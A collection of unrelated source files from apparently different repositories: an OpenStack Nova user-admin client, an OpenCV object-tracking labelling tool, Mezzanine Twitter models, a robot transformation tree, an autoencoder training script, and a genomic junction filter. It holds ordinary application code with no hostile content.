data += self.stderr_queue.popleft()
except:
self.stderr_lock.release()
raise
self.stderr_lock.release()
# [ ] detect closed pipe to return None
stderrdata = data
return (stdoutdata, stderrdata)
|
<gh_stars>0
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 Anso Labs, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Nova User API client library.
"""
import boto
from boto.ec2.regioninfo import RegionInfo
import base64
class UserInfo(object):
""" Information about a Nova user
fields include:
username
accesskey
secretkey
and an optional field containing a zip with X509 cert & rc
file
"""
def __init__(self, connection=None, username=None, endpoint=None):
self.connection = connection
self.username = username
self.endpoint = endpoint
def __repr__(self):
return 'UserInfo:%s' % self.username
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'username':
self.username = str(value)
elif name == 'file':
self.file = base64.b64decode(str(value))
elif name == 'accesskey':
self.accesskey = str(value)
elif name == 'secretkey':
self.secretkey = str(value)
class NovaAdminClient(object):
def __init__(self, clc_ip='127.0.0.1', region='nova', access_key='admin',
secret_key='admin', **kwargs):
self.clc_ip = clc_ip
self.region = region
self.access = access_key
self.secret = secret_key
self.apiconn = boto.connect_ec2(aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
is_secure=False,
region=RegionInfo(None, region, clc_ip),
port=8773,
path='/services/Admin',
**kwargs)
self.apiconn.APIVersion = 'nova'
def connection_for(self, username, **kwargs):
"""
Returns a boto ec2 connection for the given username.
"""
user = self.get_user(username)
return boto.connect_ec2(
aws_access_key_id=user.accesskey,
aws_secret_access_key=user.secretkey,
is_secure=False,
region=RegionInfo(None, self.region, self.clc_ip),
port=8773,
path='/services/Cloud',
**kwargs
)
def get_users(self):
""" grabs the list of all users """
return self.apiconn.get_list('DescribeUsers', {}, (['item', UserInfo]))
def get_user(self, name):
""" grab a single user by name """
user = self.apiconn.get_object('DescribeUser', {'Name': name}, UserInfo)
if user.username != None:
return user
def has_user(self, username):
""" determine if user exists """
return self.get_user(username) != None
def create_user(self, username):
""" creates a new user, returning the userinfo object with access/secret """
return self.apiconn.get_object('RegisterUser', {'Name': username}, UserInfo)
def delete_user(self, username):
""" deletes a user """
return self.apiconn.get_object('DeregisterUser', {'Name': username}, UserInfo)
def get_zip(self, username):
""" returns the content of a zip file containing novarc and access credentials. """
return self.apiconn.get_object('GenerateX509ForUser', {'Name': username}, UserInfo).file
|
import cv2
import csv
import os
import keyboard
videoPath = "C:\\Users\\82104\\Desktop\\차도가 아닌곳\\"
actionlist = os.listdir(videoPath)
action = 0
play = True
while action < len(actionlist):
v = actionlist[action].split(".")[-1]
print(v)
if v=='mp4':
try:
if play==True:
flag = True
cap = cv2.VideoCapture(videoPath + actionlist[action])
success,frame = cap.read()
label1_result = []
total1 = []
label2_result = []
total2 = []
f1 = open(videoPath+'label1.csv','a',newline='')
f2 = open(videoPath+'label2.csv','a',newline='')
wr1 = csv.writer(f1)
wr2 = csv.writer(f2)
isRecording = True
cnt = 0
tracker = cv2.TrackerKCF_create()
tracker1 = cv2.TrackerKCF_create()
while cap.isOpened():
cnt = cnt + 1
success, frame = cap.read()
success1, frame = cap.read()
frame = cv2.resize(frame, (640, 480))
if not success:
break
if success:
success, boxes = tracker.update(frame)
success1, boxes1 = tracker1.update(frame)
if isRecording:
x = boxes[0] + boxes[2] / 2
y = boxes[1] + boxes[3] / 2
if x!=0 and y!=0:
total1.append((((boxes[0] + boxes[2]) / 2), ((boxes[1] + boxes[3]) / 2)))
label1_result.append((cnt,(int(boxes[0] + boxes[2]) / 2), (int(boxes[1] + boxes[3]) / 2),
abs((total1[len(total1) - 1][0] - total1[len(total1) - 2][0])),
abs((total1[len(total1) - 1][1] - total1[len(total1) - 2][1])),0))
# 중앙점 x 좌표, 중앙점 y좌표,중앙점 x좌표 변화량,중앙점 y좌표 변화량,Label
#print(label1_result)
p1 = (int(boxes[0]), int(boxes[1]))
p2 = (int(boxes[0] + boxes[2]), int(boxes[1] + boxes[3]))
cv2.rectangle(frame, p1, p2, (0, 255, 0), 2, 1)
if success1:
if isRecording:
x = boxes1[0] + boxes1[2] / 2
y = boxes1[1] + boxes1[3] / 2
if x != 0 and y != 0:
total2.append((((boxes1[0] + boxes1[2]) / 2), ((boxes1[1] + boxes1[3]) / 2)))
label2_result.append((cnt,(int(boxes1[0] + boxes1[2]) / 2), (int(boxes1[1] + boxes1[3]) / 2),
abs((total2[len(total2) - 1][0] - total2[len(total2) - 2][0])),
abs((total2[len(total2) - 1][1] - total2[len(total2) - 2][1])),1))
# 중앙점 x 좌표, 중앙점 y좌표,중앙점 x좌표 변화량,중앙점 y좌표 변화량,Label
#print(boxes1)
p3 = (int(boxes1[0]), int(boxes1[1]))
p4 = (int(boxes1[0] + boxes1[2]), int(boxes1[1] + boxes1[3]))
cv2.rectangle(frame, p3, p4, (0, 0, 255), 2, 1)
cv2.imshow('frame',frame)
k = cv2.waitKey(60) & 0xFF
if k==27:
break
if k == ord('i'):
bbox = cv2.selectROI('Multitracker', frame)
result = tracker.init(frame, bbox)
if k==ord('u'):
bbox2 = cv2.selectROI('Multitracker', frame)
result = tracker1.init(frame, bbox2)
if k==ord('o'):
if isRecording==True:
isRecording = False
else:
isRecording = True
play = False
while True:
if keyboard.is_pressed('p'):
if flag==True:
print(label1_result)
for i in range(len(label1_result)):
wr1.writerow([actionlist[action],label1_result[i][0], label1_result[i][1], label1_result[i][2], label1_result[i][3],
label1_result[i][4],label1_result[i][5]])
for j in range(len(label2_result)):
wr2.writerow([actionlist[action],label2_result[j][0], label2_result[j][1], label2_result[j][2], label2_result[j][3],
label2_result[j][4],label2_result[j][5]])
print('finish')
f1.close()
f2.close()
flag = False
cap.release()
cv2.destroyAllWindows()
if keyboard.is_pressed('s'):
action = action + 1
play = True
f1.close()
f2.close()
cap.release()
cv2.destroyAllWindows()
break
if keyboard.is_pressed('a'):
play = True
f1.close()
f2.close()
cap.release()
cv2.destroyAllWindows()
break
except Exception as e:
print(str(e))
while True:
if keyboard.is_pressed('p'):
if flag == True:
print(label1_result)
for i in range(len(label1_result)):
wr1.writerow([actionlist[action], label1_result[i][0], label1_result[i][1], label1_result[i][2],
label1_result[i][3],
label1_result[i][4], label1_result[i][5]])
for j in range(len(label2_result)):
wr2.writerow([actionlist[action], label2_result[j][0], label2_result[j][1], label2_result[j][2],
label2_result[j][3],
label2_result[j][4], label2_result[j][5]])
print('finish')
f1.close()
f2.close()
flag = False
cap.release()
cv2.destroyAllWindows()
if keyboard.is_pressed('s'):
action = action + 1
play = True
f1.close()
f2.close()
cap.release()
cv2.destroyAllWindows()
break
if keyboard.is_pressed('a'):
play = True
f1.close()
f2.close()
cap.release()
cv2.destroyAllWindows()
break
else:
action = action + 1 |
from __future__ import unicode_literals
from future.builtins import str
from datetime import datetime, timedelta
import re
from time import timezone
try:
from urllib.parse import quote
except ImportError: # Python 2
from urllib import quote
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import urlize
from django.utils.timezone import get_default_timezone, make_aware
from django.utils.translation import ugettext_lazy as _
from requests_oauthlib import OAuth1
import requests
from mezzanine.conf import settings
from mezzanine.twitter import QUERY_TYPE_CHOICES, QUERY_TYPE_USER, \
QUERY_TYPE_LIST, QUERY_TYPE_SEARCH
from mezzanine.twitter.managers import TweetManager
re_usernames = re.compile("@([0-9a-zA-Z+_]+)", re.IGNORECASE)
re_hashtags = re.compile("#([0-9a-zA-Z+_]+)", re.IGNORECASE)
replace_hashtags = "<a href=\"http://twitter.com/search?q=%23\\1\">#\\1</a>"
replace_usernames = "<a href=\"http://twitter.com/\\1\">@\\1</a>"
class TwitterQueryException(Exception):
pass
@python_2_unicode_compatible
class Query(models.Model):
type = models.CharField(_("Type"), choices=QUERY_TYPE_CHOICES,
max_length=10)
value = models.CharField(_("Value"), max_length=140)
interested = models.BooleanField("Interested", default=True)
class Meta:
verbose_name = _("Twitter query")
verbose_name_plural = _("Twitter queries")
ordering = ("-id",)
def __str__(self):
return "%s: %s" % (self.get_type_display(), self.value)
def run(self):
"""
Request new tweets from the Twitter API.
"""
urls = {
QUERY_TYPE_USER: ("https://api.twitter.com/1.1/statuses/"
"user_timeline.json?screen_name=%s"
"&include_rts=true" %
self.value.lstrip("@")),
QUERY_TYPE_LIST: ("https://api.twitter.com/1.1/lists/statuses.json"
"?list_id=%s&include_rts=true" %
self.value.encode("utf-8")),
QUERY_TYPE_SEARCH: "https://api.twitter.com/1.1/search/tweets.json"
"?q=%s" %
quote(self.value.encode("utf-8")),
}
try:
url = urls[self.type]
except KeyError:
raise TwitterQueryException("Invalid query type: %s" % self.type)
settings.use_editable()
auth_settings = (settings.TWITTER_CONSUMER_KEY,
settings.TWITTER_CONSUMER_SECRET,
settings.TWITTER_ACCESS_TOKEN_KEY,
settings.TWITTER_ACCESS_TOKEN_SECRET)
if not all(auth_settings):
from mezzanine.conf import registry
if self.value == registry["TWITTER_DEFAULT_QUERY"]["default"]:
# These are some read-only keys and secrets we use
# for the default query (eg nothing has been configured)
auth_settings = (
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
)
else:
raise TwitterQueryException("Twitter OAuth settings missing")
try:
tweets = requests.get(url, auth=OAuth1(*auth_settings)).json()
except Exception as e:
raise TwitterQueryException("Error retrieving: %s" % e)
try:
raise TwitterQueryException(tweets["errors"][0]["message"])
except (IndexError, KeyError, TypeError):
pass
if self.type == "search":
tweets = tweets["statuses"]
for tweet_json in tweets:
remote_id = str(tweet_json["id"])
tweet, created = self.tweets.get_or_create(remote_id=remote_id)
if not created:
continue
if "retweeted_status" in tweet_json:
user = tweet_json['user']
tweet.retweeter_user_name = user["screen_name"]
tweet.retweeter_full_name = user["name"]
tweet.retweeter_profile_image_url = user["profile_image_url"]
tweet_json = tweet_json["retweeted_status"]
if self.type == QUERY_TYPE_SEARCH:
tweet.user_name = tweet_json['user']['screen_name']
tweet.full_name = tweet_json['user']['name']
tweet.profile_image_url = \
tweet_json['user']["profile_image_url"]
date_format = "%a %b %d %H:%M:%S +0000 %Y"
else:
user = tweet_json["user"]
tweet.user_name = user["screen_name"]
tweet.full_name = user["name"]
tweet.profile_image_url = user["profile_image_url"]
date_format = "%a %b %d %H:%M:%S +0000 %Y"
tweet.text = urlize(tweet_json["text"])
tweet.text = re_usernames.sub(replace_usernames, tweet.text)
tweet.text = re_hashtags.sub(replace_hashtags, tweet.text)
if getattr(settings, 'TWITTER_STRIP_HIGH_MULTIBYTE', False):
chars = [ch for ch in tweet.text if ord(ch) < 0x800]
tweet.text = ''.join(chars)
d = datetime.strptime(tweet_json["created_at"], date_format)
d -= timedelta(seconds=timezone)
tweet.created_at = make_aware(d, get_default_timezone())
tweet.save()
self.interested = False
self.save()
class Tweet(models.Model):
remote_id = models.CharField(_("Twitter ID"), max_length=50)
created_at = models.DateTimeField(_("Date/time"), null=True)
text = models.TextField(_("Message"), null=True)
profile_image_url = models.URLField(_("Profile image URL"), null=True)
user_name = models.CharField(_("User name"), max_length=100, null=True)
full_name = models.CharField(_("Full name"), max_length=100, null=True)
retweeter_profile_image_url = models.URLField(
_("Profile image URL (Retweeted by)"), null=True)
retweeter_user_name = models.CharField(
_("User name (Retweeted by)"), max_length=100, null=True)
retweeter_full_name = models.CharField(
_("Full name (Retweeted by)"), max_length=100, null=True)
query = models.ForeignKey("Query", related_name="tweets")
objects = TweetManager()
class Meta:
verbose_name = _("Tweet")
verbose_name_plural = _("Tweets")
ordering = ("-created_at",)
def __str__(self):
return "%s: %s" % (self.user_name, self.text)
def is_retweet(self):
return self.retweeter_user_name is not None
|
<reponame>cheng-chi/cinebot_mini
import ikpy
import numpy as np
from ete3 import Tree
from cinebot_mini.web_utils.blender_client import *
from cinebot_mini.geometry_utils.closed_form_ik import inverse_kinematics_closed_form
class TransformationTree:
def __init__(self):
"""A dictionary containing children of a node"""
self.children = {}
"""A dictionary containing parent of a node"""
self.parent = {}
"""A dictionary containing transformation to its parent.
If node is link on ikpy chain, this entry should store the name of the chain."""
self.transforms = {}
"""A dictionary mapping chain name to ikpy Chain object."""
self.chains = {}
"""A dictionary stores joint angles of a ikpy Chain"""
self.chain_states = {}
self.tree = Tree()
self.transforms["ROOT"] = np.eye(4)
def add_node(self, parent_name, child_name, matrix):
"""
parent_ name: string
child_name: string, the name of this node
matrix: 4x4 homogeneous matrix, relative to parent
"""
if child_name in self.parent:
raise NameError
self.parent[child_name] = parent_name
self.transforms[child_name] = matrix
if parent_name not in self.children:
self.children[parent_name] = []
self.children[parent_name].append(child_name)
def add_chain(self, parent_name, chain: ikpy.chain.Chain):
"""
parent_name: string
chain: ikpy.chain.Chain
"""
chain_name = chain.name
if chain_name in self.chains:
raise NameError
self.chains[chain_name] = chain
self.add_node(parent_name, chain.links[0].name, np.eye(4))
for i in range(len(chain.links)-1):
self.add_node(chain.links[i].name, chain.links[i+1].name, chain_name)
default_state = [0 for _ in range(len(chain.links) - 1)]
self.set_chain_state(chain_name, default_state)
def set_chain_state(self, chain_name, state):
"""
Chain_name: string
State: (a Iterable of floats) or (a 1D numpy array)
The length of the state should match the corresponding chain. If not, raise an exception.
"""
if len(self.chains[chain_name].links) != (len(state) + 1):
raise ValueError
self.chain_states[chain_name] = state
def get_ancestor(self, node):
# ancestor = [node]
ancestor = []
while node in self.parent:
node = self.parent[node]
ancestor.append(node)
return ancestor
def get_transform_same(self, to_name, from_name, ancestor):
"""
Return the 4x4 homogeneous matrix from two nodes on the same branch
"""
trace = ancestor[: ancestor.index(to_name)]
trace.insert(0, from_name)
H = np.eye(4)
chain_name = ''
link_count = 0
for i in range(len(trace)):
node = trace[i]
if type(self.transforms[node]) == str:
if self.transforms[node] != chain_name:
chain_name = self.transforms[node]
link_count = 0
link_count += 1
else:
# either a node or a chain base
if link_count > 0:
chain = self.chains[chain_name]
state = self.chain_states[chain_name]
link_transform = chain.forward_kinematics([0] + list(state), full_kinematics=True)[link_count]
H = np.dot(link_transform, H)
link_count = 0
H = np.dot(self.transforms[node], H)
if link_count > 0:
# to_name is a link in a chain
chain = self.chains[chain_name]
state = self.chain_states[chain_name]
if type(self.transforms[to_name]) != str:
# to_name is the chain base
link_transform = chain.forward_kinematics([0] + list(state), full_kinematics=True)[link_count]
H = np.dot(link_transform, H)
else:
# find the position of from_name link
for j in range(len(chain.links)):
if chain.links[j].name == from_name:
break
# to_name -> links[j]
# end link -> links[j + link_count]
forward_transforms = chain.forward_kinematics(state, full_kinematics=True)
end_base = forward_transforms[j + link_count]
from_base = forward_transforms[j]
# end_base = from_base * end_from
end_from = np.dot(np.array(np.mat(from_base).I), end_base)
H = np.dot(end_from, H)
return H
def get_transform(self, from_name, to_name="ROOT"):
"""
from_name: string
to_name: string
Should return 4x4 homogeneous matrix from “from_name” node to “to_name” node.
Note: the two frames queried might not be on the same branch of the transformation tree! Some non-trivial tree traversal algorithm is needed.
"""
if to_name == from_name:
return np.mat(np.eye(4))
from_name_ancestor = self.get_ancestor(from_name)
# print(to_name_ancestor)
if to_name in from_name_ancestor:
# to_name and from_name are on the same branch
return self.get_transform_same(to_name, from_name, from_name_ancestor)
to_name_ancestor = self.get_ancestor(to_name)
# print(from_name_ancestor)
if from_name in to_name_ancestor:
# from_name is descendant of to_name
return np.array(np.mat(self.get_transform_same(from_name, to_name, to_name_ancestor)).I)
common_ancestor = None
# to_name and from_name are on different branches
for i in range(len(from_name_ancestor)):
if from_name_ancestor[i] in to_name_ancestor:
common_ancestor = from_name_ancestor[i]
break
from_common = self.get_transform_same(common_ancestor, from_name, from_name_ancestor)
to_common = self.get_transform_same(common_ancestor, to_name, to_name_ancestor)
# from_common = to_common * from_to
from_to = np.dot(np.array(np.mat(to_common).I), from_common)
return from_to
def set_transform(self, frame_name, transform_mat):
"""
Sets state of nearest parent chain, raises exception if cannot be done.
:param frame_name:
:param transform_mat:
:return:
"""
chain_name = None
top_to_end_effector = np.eye(4)
chain_root_to_root = np.eye(4)
curr_frame = frame_name
while True:
if curr_frame not in self.parent:
# we are at root
break
if type(self.transforms[curr_frame]) is str:
# we found the first chain
chain_name = self.transforms[curr_frame]
chain_root_name = self.chains[chain_name].links[0].name
chain_root_to_root = self.get_transform(chain_root_name)
break
curr_to_parent = self.transforms[curr_frame]
top_to_end_effector = curr_to_parent @ top_to_end_effector
curr_frame = self.parent[curr_frame]
if chain_name is None:
raise RuntimeError("Could not find chain between this frame and ROOT.")
end_effector_to_chain_root = np.linalg.inv(chain_root_to_root)\
@ transform_mat\
@ np.linalg.inv(top_to_end_effector)
initial_config = self.chain_states[chain_name]
# new_config = self.chains[chain_name].inverse_kinematics(
# end_effector_to_chain_root, [0] + list(initial_config))
try:
# new_config = inverse_kinematics_closed_form(
# self.chains[chain_name],
# end_effector_to_chain_root,
# [0] + list(initial_config))
new_config = inverse_kinematics_closed_form(
self.chains[chain_name],
end_effector_to_chain_root)
self.set_chain_state(chain_name, new_config[1:])
except ValueError as e:
print("Value error, transform:")
print(transform_mat)
def get_subtree(self, t, node_name):
if node_name in self.children:
tree_node = t.search_nodes(name=node_name)[0]
for child in self.children[node_name]:
tree_node.add_child(name=child)
for child in self.children[node_name]:
t = self.get_subtree(t, child)
return t
def get_ete(self):
"""
Return a ete3.Tree representing the topology of the transformation tree, with each node having its corresponding name.
"""
return self.get_subtree(Tree("ROOT;"), "ROOT")
def plot(self):
"""
Plot the tree with ete3
"""
self.tree = self.get_ete()
print(self.tree.get_ascii(show_internal=True))
def plot_blender(self, axis_size=0.05):
for frame_name in self.transforms.keys():
if not test_object_exist(frame_name):
create_object(frame_name, type="EMPTY")
set_property(frame_name, "empty_display_size", axis_size)
for frame_name in self.transforms.keys():
matrix = self.get_transform(frame_name)
set_transform_matrix(frame_name, matrix)
def set_transform_blender(self, frame_name):
assert(frame_name in self.transforms)
camera_properties = get_property(frame_name)
b_camera_mat = np.array(camera_properties["properties"]["matrix_world"])
self.set_transform(frame_name, b_camera_mat)
def add_node_relative(self, parent_name, child_name, reference_name, child_ref):
"""
parent_name: string, the name of the parent node
child_name: string, the name of this node
Referece_name: string, the name of reference node
child_ref: 4x4 homogeneous matrix, relative to reference node
"""
parent_ref = self.get_transform(parent_name, reference_name)
# child_ref = parent_ref * child_parent
child_parent = np.dot(np.array(np.mat(parent_ref).I), child_ref)
self.add_node(parent_name, child_name, child_parent)
|
import torch
import torch.nn as nn
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from models import ConvAutoencoder, ImgDataset
import argparse
import time
import os
def ensure_folder(folder):
if not os.path.exists(folder):
os.makedirs(folder)
def time_msec():
return int(round(time.time() * 1000))
def train(input_folder, output_folder, lr=0.001, epochs=40, img_format='.png'):
ensure_folder(output_folder)
model = ConvAutoencoder()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = model.to(device)
transform = transforms.ToTensor()
train_folder = input_folder + '/train'
print(f"Create train dataset from - {train_folder}")
train_data = ImgDataset(train_folder, transform, device, img_format)
print(f"Train dataset size - {len(train_data)}")
# Create training
num_workers = 0
# how many samples per batch to load
batch_size = 20
# prepare data loaders
print(f"Create dataloader batches={batch_size} and workers={num_workers}")
train_loader = DataLoader(train_data, batch_size=batch_size, num_workers=num_workers, shuffle=True)
# specify loss function
criterion = nn.BCELoss()
# specify loss function
optimizer = torch.optim.Adam(model.parameters(), lr)
# number of epochs to train the model
n_epochs = epochs
for epoch in range(1, n_epochs + 1):
# monitor training loss
train_loss = 0.0
###################
# Train the model #
###################
model.train()
train_loss = 0
for images in train_loader:
# _ stands in for labels, here
# no need to flatten images
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
outputs, encoder_output = model(images, encoder_mode=False)
# calculate the loss
loss = criterion(outputs, images)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item() * images.size(0)
# print avg training statistics
train_loss = train_loss / len(train_loader)
print('Epoch: {} \tTraining Loss: {:.6f}'.format(epoch, train_loss))
###################
# Test the model #
###################
model.eval()
test_folder = input_folder + '/test'
test_data = ImgDataset(test_folder, transform, device, img_format)
test_loader = DataLoader(test_data, batch_size=batch_size, num_workers=num_workers)
eval_loss = 0
for images in test_loader:
# forward pass: compute predicted outputs by passing inputs to the model
outputs, x_encoders = model(images, encoder_mode=False)
# calculate the loss
loss = criterion(outputs, images)
# update running training loss
eval_loss += loss.item() * images.size(0)
# print avg evaluation statistics
eval_loss = eval_loss / len(test_loader)
print('\tEvaluation Loss: {:.6f}'.format(eval_loss))
# Save model
model_root = output_folder + '/conv_autoencoder_' + str(time_msec()) + '.pt'
print(f"Saving trained model to: {model_root}")
torch.save(model.state_dict(), model_root)
def main():
parser = argparse.ArgumentParser(description='Train conv autoencoder on dataset.'
'Must have train and test dataset folders'
' located in input')
parser.add_argument('input', metavar='input', type=str,
help='Source folder full path.')
parser.add_argument('output', metavar='output', type=str,
help='Destination folder full path.')
parser.add_argument('lr', metavar='lt', type=str,
help='Learning rate')
parser.add_argument('epochs', metavar='epochs', type=str,
help='Number of training epochs.')
args = parser.parse_args()
input_folder = args.input
output_folder = args.output
lr = args.lr
epochs = args.epochs
train(input_folder, output_folder, float(lr), int(epochs))
if __name__ == '__main__':
print("<<<<<<<<<<<<<<< Start training >>>>>>>>>>>>>>>>>")
main()
|
import time,sys,getopt,os
def bl8_jun_filter(bl8_format,junfile,genefile,criterion_len,prefix,gap_j):
fr_jun_bl8 = [r1.strip().split("\t") for r1 in open(bl8_format).readlines()]
fr_jun_type1 = [r2.strip().split("\t") for r2 in open(junfile).readlines()]
fr_genebody=[r3.strip().split("\t") for r3 in open(genefile).readlines()]
nf=len(fr_jun_bl8);type2_erro_list=[];jun_dict={}
ns= len(fr_jun_type1);seg_dict={}
ne=len(fr_genebody);gene_plus_dict={};gene_minus_dict={}
for b_j in range(nf):
par_j = fr_jun_bl8[b_j][0].split("*")[0]
if jun_dict.has_key(par_j):
jun_dict[par_j].append(fr_jun_bl8[b_j])
else:
jun_dict[par_j]=[fr_jun_bl8[b_j]]
for b_e in range(ne):
par_e = [fr_genebody[b_e][0], float(fr_genebody[b_e][3]), float(fr_genebody[b_e][4]), fr_genebody[b_e][7],fr_genebody[b_e][8]]
par_chr=fr_genebody[b_e][0]
if fr_genebody[b_e][6]=="+":
if gene_plus_dict.has_key(par_chr):
gene_plus_dict[par_chr].append(par_e)
else:
gene_plus_dict[par_chr]=[par_e]
elif fr_genebody[b_e][6]=="-":
if gene_minus_dict.has_key(par_chr):
gene_minus_dict[par_chr].append(par_e)
else:
gene_minus_dict[par_chr]=[par_e]
for b_s in range(ns):
par_s=fr_jun_type1[b_s][0]+"_"+fr_jun_type1[b_s][1]+"_"+fr_jun_type1[b_s][2]
seg_dict[par_s]=[fr_jun_type1[b_s][5],fr_jun_type1[b_s][3]]
for vx in jun_dict.keys():
jun_list=jun_dict[vx]
jun_l_l=float(jun_dict[vx][0][0].split("*")[1].split("~")[0])
jun_l_r=float(jun_dict[vx][0][0].split("*")[1].split("~")[1])
jun_l_mid = (jun_l_l+jun_l_r) / 2
jun_r_l=float(jun_dict[vx][0][0].split("*")[1].split("~")[2])
jun_r_r=float(jun_dict[vx][0][0].split("*")[1].split("~")[3][:-2])
jun_r_mid = (jun_r_l +jun_r_r) / 2
chr_w=seg_dict[vx][1]
nchr = jun_dict[vx][0][0].split("_")[0]
leftfactor = False
rightfactor = False
leftfactor, rightfactor, fus_list_els = find_primary_map(jun_list,jun_l_mid, jun_r_mid,nchr,gap_j,leftfactor,rightfactor)
if leftfactor and rightfactor:
for pj in jun_list:
old_len=len(type2_erro_list)
type2_erro_list=filter_one_jun(pj,nchr,jun_l_mid, jun_r_mid, jun_l_l, jun_l_r, jun_r_l, jun_r_r, type2_erro_list, chr_w, gene_plus_dict, gene_minus_dict, vx,criterion_len,gap_j)
if len(type2_erro_list)> old_len:
break
else:
type2_erro_list.append([vx] + jun_list[1]+["couldnot mapping back"])
lf = open(prefix+"_wrong_bl8",'w+')
t1_list=[]
for it in type2_erro_list:
ss = '\t'.join(it)
t1_list.append(ss)
lf.writelines("\n".join(t1_list) + "\n")
lf.close()
return type2_erro_list
def find_primary_map(jun_list,jun_l_mid, jun_r_mid,nchr,gap_j,leftfactor,rightfactor):
jun_list_pre=[];gap_j=gap_j+20
for pj_1 in jun_list:
q_l = float(pj_1[6])
q_r = float(pj_1[7])
len_seq = float(pj_1[3])
map_identity = float(pj_1[2])
t_l_1 = min(float(pj_1[8]), float(pj_1[9]))
t_r_1 = max(float(pj_1[8]), float(pj_1[9]))
mid_t_1=(t_l_1+t_r_1)/2
if map_identity > 90 and abs(len_seq -100)<=30 and pj_1[1]==nchr:
if abs(mid_t_1-jun_l_mid)<=gap_j or abs(mid_t_1-jun_r_mid)<=gap_j:
if q_r >= 100 - gap_j and q_r <= 100 + gap_j:
jun_list_pre.append(pj_1)
leftfactor=True
elif q_l >= 100-gap_j and q_l <= 100+gap_j:
jun_list_pre.append(pj_1)
rightfactor = True
jun_list_els= [kk for kk in jun_list if kk not in jun_list_pre]
return leftfactor,rightfactor,jun_list_els
def filter_one_jun(pj,nchr,jun_l_mid,jun_r_mid,jun_l_l,jun_l_r,jun_r_l,jun_r_r,type2_erro_list,chr_w,gene_plus_dict,gene_minus_dict,vx,criterion_len,gap_j):
q_l = float(pj[6]);q_r = float(pj[7]);t_l = min(float(pj[8]),float(pj[9]));t_r = max(float(pj[8]),float(pj[9]))
mid_t = (t_l + t_r) / 2;len_seq = float(pj[3]);map_identity = float(pj[2])
chr_p = pj[1]
if abs(mid_t - jun_l_mid) > 50 and abs(mid_t - jun_r_mid) > 50 and map_identity > 85:
if (q_r >= 100-gap_j and q_r <= 100+gap_j) or (q_l >= 100-gap_j and q_l <= 100+gap_j):
if map_identity ==100 and len_seq > criterion_len:
type2_erro_list.append([vx] + pj+['SameIdentityfalse_1'])
elif map_identity >= 95 and len_seq >= 100-gap_j-20 and len_seq<=100+gap_j+20:
type2_erro_list.append([vx] + pj + ['SameIdentityfalse_2'])
elif len_seq >20 and gene_plus_dict.has_key(chr_p) and gene_minus_dict.has_key(chr_p):
type2_erro_list = filter_same_gene(vx, pj,nchr,t_l, t_r, gene_plus_dict, gene_minus_dict,type2_erro_list,chr_w,jun_l_l,jun_l_r,jun_r_l, jun_r_r)
elif q_l <= 60 and q_r >= 140 and len_seq > criterion_len and map_identity > 95:
type2_erro_list.append([vx] + pj+["Co_linear explanation"])
return type2_erro_list
def filter_same_gene(vx, pj,nchr,t_l, t_r,gene_plus_dict, gene_minus_dict, type2_erro_list,chr_w,jun_l_l,jun_l_r,jun_r_l, jun_r_r):
gene_jun_l=gene_jun_r = 0;gene_q = 1;chr_t=pj[1];gene_list=[]
if chr_w == "+":
gene_list = gene_plus_dict[chr_t]
elif chr_w == "-":
gene_list = gene_minus_dict[chr_t]
for p_e1 in gene_list:
if nchr == p_e1[0] and (min(jun_l_r,p_e1[2])-max(jun_l_l,p_e1[1]))>20:
gene_jun_l = p_e1[3:]
break
else:
gene_jun_l = ['none1','none1']
for p_e2 in gene_list:
if nchr == p_e2[0] and (min(jun_r_r,p_e2[2])-max(jun_r_l,p_e2[1]))>20:
gene_jun_r = p_e2[3:]
break
else:
gene_jun_r = ['none2', 'none2']
for p_e3 in gene_list:
if chr_t == p_e3[0] and (min(t_r,p_e3[2])-max(t_l,p_e3[1]))>20:
gene_q = p_e3[3:]
break
else:
gene_q=['none3', 'none3']
if gene_q[0]==gene_jun_l[0] or gene_q[0]==gene_jun_r[0] or gene_jun_l[0]==gene_jun_r[0]:
type2_erro_list.append([vx] + pj+['SameGeneFalse'])
else:
if gene_q[1] != 'none':
if gene_q[1] == gene_jun_l[1] or gene_q[1] == gene_jun_r[1] or gene_jun_l[1]==gene_jun_r[1]:
if gene_jun_r[1] != "none":
type2_erro_list.append([vx] + pj + ['SameGeneFalse'])
return type2_erro_list
def co_jun_filter(bl8file,typeI_junfile,prefix):
fr_bl8 = [r1.strip().split("\t") for r1 in open(bl8file).readlines()]
fr_jun = [r1.strip().split("\t") for r1 in open(typeI_junfile).readlines()]
n_jun=len(fr_jun);all_jun={}
list_jun=[];filtered_jun=[]
for ap in range(n_jun):
pp=fr_jun[ap][0]+'_'+fr_jun[ap][1]+"_"+fr_jun[ap][2]
all_jun[pp]=1
for bp in fr_bl8:
pp1=bp[0]
if all_jun.has_key(pp1):
all_jun[pp1]=all_jun[pp1]+1
for (k,v) in all_jun.items():
if v==1:
list_jun.append(k)
for ap2 in range(n_jun):
pp3=fr_jun[ap2][0]+'_'+fr_jun[ap2][1]+"_"+fr_jun[ap2][2]
if pp3 in list_jun:
filtered_jun.append(fr_jun[ap2])
t2_list=[]
for it2 in filtered_jun:
ss2 = '\t'.join(it2[:5]+it2[-4:])
t2_list.append(ss2)
if len(t2_list)>0:
lf2 = open(prefix + "_typeIIfiltered.txt", 'w+')
lf2.writelines("\n".join(t2_list) + "\n")
lf2.close()
return all_jun,list_jun
def main(argv):
t1 = time.time()
typeI_junfile =''
bl8_format=''
genefile=''
try:
opts, args = getopt.getopt(argv, "hi:b:e:", ["ifile=","bfile=","efile="])
except getopt.GetoptError:
